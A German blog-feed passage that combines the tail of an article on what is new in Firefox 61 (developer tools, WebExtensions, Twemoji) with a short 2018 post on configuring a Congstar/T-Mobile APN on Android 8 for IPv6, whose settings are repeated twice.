Hat der Nutzer eine Erweiterung installiert, welche die Startseite von Firefox überschreibt, zeigt Firefox bei der ersten Benutzung nun einen Hinweis an, dass die Startseite überschrieben wird und durch welche Erweiterung. Ähnliches macht Firefox bereits, wenn die Seite überschrieben wird, die beim Öffnen eines neuen Tabs erscheint.

Firefox 61

Mit Firefox 61 werden auch Wörterbücher als WebExtensions unterstützt. Es wurden noch viele weitere Neuerungen für WebExtension-Entwickler implementiert. Diese alle aufzuzählen, würde einen ganz eigenen Artikel füllen, daher sei an dieser Stelle auf den offiziellen Mozilla-Blog verwiesen, wo sämtliche Neuerungen für WebExtension-Entwickler aufgelistet werden.

Verbesserungen der Webplattform

Natürlich gibt es auch bezüglich Webstandards wie immer auch in Firefox 61 Neuerungen.

Die Unterstützung der nicht standardisierten @-moz-document-Regel wurde für Webseiten entfernt, aus Gründen der Web-Kompatibilität außer in Form eines leeren url-prefix()-Wertes.

Weitere Informationen zu Änderungen für Webentwickler in Firefox 61 finden sich in den MDN web docs.

Neuerungen für Webentwickler

Reihenfolge der Entwickler-Werkzeuge kann geändert werden

Was die Reihenfolge der Entwickler-Werkzeuge betrifft, so hat jeder Entwickler seine eigenen Vorlieben. Werkzeuge, die man häufiger benötigt, will man dabei wahrscheinlich mit so kurzen Wegen wie nur möglich erreichen. Mit Firefox 61 wird Mozilla diesem Anspruch gerecht. Dann nämlich ist es möglich, die Reihenfolge der Entwickler-Werkzeuge beliebig per Drag and Drop zu ändern.

Tipp: Firefox besitzt noch einige Entwickler-Werkzeuge mehr als nur diejenigen, welche standardmäßig sichtbar sind. Wer bei geöffneten Entwickler-Werkzeugen die Taste F1 drückt (oder auch über das Menü-Symbol auf der rechten Seite), gelangt in die Einstellungen der Entwickler-Werkzeuge, wo weitere Werkzeuge aktiviert oder auch standardmäßig angezeigte Werkzeuge deaktiviert werden können.

Neue Browser-Konsole

Nachdem die Web-Konsole bereits in Firefox 57 ein komplett neues Frontend erhalten hat, welches nicht länger auf Mozillas proprietärem XUL-Standard basiert, sondern mit Webtechnologie umgesetzt worden ist, wird das neue Konsolen-Frontend nun auch für die Browser-Konsole verwendet.

Neues Werkzeug für Barrierefreiheit

In den Einstellungen der Entwickler-Werkzeuge kann ein neues Werkzeug für Barrierefreiheit aktiviert werden. Weitere Details dazu gibt es hier.

Firefox 61

Sonstige Neuerungen für Webentwickler

Für die Entwickler-Werkzeuge konnte bisher eines von drei Themes ausgewählt werden: ein helles Theme, ein dunkles und ein Firebug-Theme. Dieses war an das Design der früher weit verbreiteten Firebug-Erweiterung angelehnt. Nachdem die Übergangsphase, in der sich frühere Firebug-Nutzer an die Firefox-Werkzeuge gewöhnt haben, mittlerweile als vorbei bezeichnet werden kann, wurde das Firebug-Theme nun aus Firefox entfernt.

Im Inspektor-Werkzeug gab es die grafische Präsentation des Box-Modells bisher sowohl im „Berechnet“- als auch im „Layout“-Panel. Aus ersterem wurde das Box-Modell nun entfernt, so dass diese Funktion nicht mehr doppelt ist. Auch wurde die Darstellung des Box-Modells optisch überarbeitet.

Auf der rechten Seite der Tab-Leiste der Entwickler-Werkzeuge gibt es nun deutlich weniger Symbole. Dafür gibt es dort ein neues Menü-Symbol mit drei Punkten, worüber sich die bisher dort zu findenden Optionen auswählen lassen. Zum einen wirkt die Oberfläche dadurch aufgeräumter, zum anderen sind die Funktionen klarer, weil nun Text anstelle von Symbolen verwendet wird.

Firefox 61

Im Netzwerk-Panel gibt es nun die Möglichkeit, langsame Internet-Verbindungen zu simulieren. Dieses Feature war bisher nur über den Responsive Design Modus zugänglich. Auch die Möglichkeit, HAR-Archive zu importieren und zu exportieren, findet sich nun hier.

Für Ressourcen, die aus dem Cache geladen werden, gibt es jetzt einen eigenen Cache-Reiter mit Informationen zu den Caching-Eigenschaften der jeweiligen Ressource.

Firefox 61

Der Debugger von Firefox 61 besitzt nun ein Verständnis von Babel und Webpack, was es möglich macht, mit dem Original-Code im Debugger zu interagieren, so als wären die Script-Dateien nicht zusammengefügt und minimiert worden.

Video auf YouTube ansehen

Optionale Features

Einstellung zum Schließen von Tabs per Doppelklick

Tabs in Firefox können entweder per Tastatur (Strg + W; macOS: Cmd + W) geschlossen werden oder über die Schließen-Schaltfläche im Tab. Ab Firefox 61 kommt für aktive Tabs eine weitere Option dazu: wird zunächst über about:config der Schalter browser.tabs.closeTabByDblclick durch einen Doppelklick auf true geschaltet, lassen sich aktive Tabs auch durch einen Doppelklick schließen.

Sonstige Neuerungen von Firefox 61

Soll auf Windows bei Ausführung des sogenannten Stub Installers der Installationsvorgang von Firefox abgebrochen werden, bietet der Installer jetzt die Option an, die Installation fortzusetzen. Durch eine Verbesserung der Kompression konnte die Größe von Firefox-Updates minimal reduziert werden.

Firefox wird seit Version 50 mit EmojiOne ausgeliefert, damit Emojis auch in alten Windows-Versionen und auf Linux dargestellt werden können, wo die Emoji-Unterstüzung mangelhaft ist. Nachdem die neuste Version von EmojiOne unter einer anderen Lizenz steht, die nicht kompatibel mit den Anforderungen von Mozilla ist, wurde EmojiOne durch die freie Emoji-Font Twemoji von Twitter ersetzt.

In Firefox 56 hatte Mozilla eine versteckte Funktion zur Sitzungswiederherstellung implementiert. War eine entsprechende Einstellung in about:config gesetzt und Firefox so konfiguriert, dass er bei Start nicht automatisch die Tabs wiederherstellt, wurde beim Start in der Tab-Leiste eine Schaltfläche zur Sitzungswiederherstellung hinzugefügt. Nachdem Mozilla damit experimentiert und derzeit keine Pläne hat, das Konzept weiterzuverfolgen, wurde diese versteckte Funktion wieder entfernt. Entfernt wurde auch die Möglichkeit, Java-Archive (JAR) zu öffnen. Diese Möglichkeit war bereits seit Firefox 55 standardmäßig deaktiviert.

Es wurde eine neue Möglichkeit implementiert, den Browser schnell neu zu starten: Strg + Shift + J (zum Öffnen der Browser-Konsole) und anschließend Strg + Alt + R.

Randnotiz: mein erster Beitrag zum Firefox-Code

Eine kleine Randnotiz: Firefox 61 ist die erste Firefox-Version, zu welcher auch ich Code beigetragen habe. Genauer gesagt habe ich eine WebExtension-Schnittstelle hinzugefügt, um Webseiten zu zwingen, die System-Schriftarten zu verwenden statt die Schriftarten, welche die Webseite vorgibt.

Der Beitrag Mozilla veröffentlicht Firefox 61 – die Neuerungen erschien zuerst auf soeren-hentzschel.at.

29. Juni 2018

Achtung

Dieser Beitrag ist schon sehr alt, und die Infos hier sind sicherlich hoffnungslos veraltet…

Ich nutze Android8 und habe festgestellt, dass ich mir im Congstar Mobilnetz eine IPv6-Adresse geben kann. Hierzu gehe ich in den Einstelungen zu VERBINDUNGEN - MOBILE NETZWERKE - ZUGANGSPUNKTE - und wähle “hinzufügen”.

Folgende Felder habe ich eingeragen:

Name: T-Mobile Internet
APN: internet.t-mobile
Benutzername: telekom (oder congstar eintragen)
Kennwort: tm (oder cs eintragen, wenn als Benutzer congstar gewählt wurde)
MCC: 262
MNC: 01
Authentifizierung: CHAP
APN-Typ: default,supl,mms
APN-Protokoll IPv4/IPv6

Alles andere habe ich nicht angegeben/so belassen.

Jetzt noch speichern, und ich kann den neuen ANP auswählen. Und zack, hat mein Handy eine gültige globale IPv6 Adresse. Diese sieht man zB unter Einstelungen, Telefoninfo, Status.

Ich nutze Android8 und habe festgestellt, dass ich mir im Congstar Mobilnetz eine IPv6-Adresse geben kann. Hierzu gehe ich in den Einstelungen zu VERBINDUNGEN - MOBILE NETZWERKE - ZUGANGSPUNKTE - und wähle “hinzufügen”. Folgende Felder habe ich eingeragen: Name: T-Mobile Internet APN: internet.t-mobile Benutzername: telekom (oder congstar eintragen) Kennwort: tm (oder cs eintragen, wenn als Benutzer congstar gewählt wurde) MCC: 262 MNC: 01 Authentifizierung: CHAP APN-Typ: default,supl,mms APN-Protokoll IPv4/IPv6 Alles andere habe ich nicht angegeben/so belassen.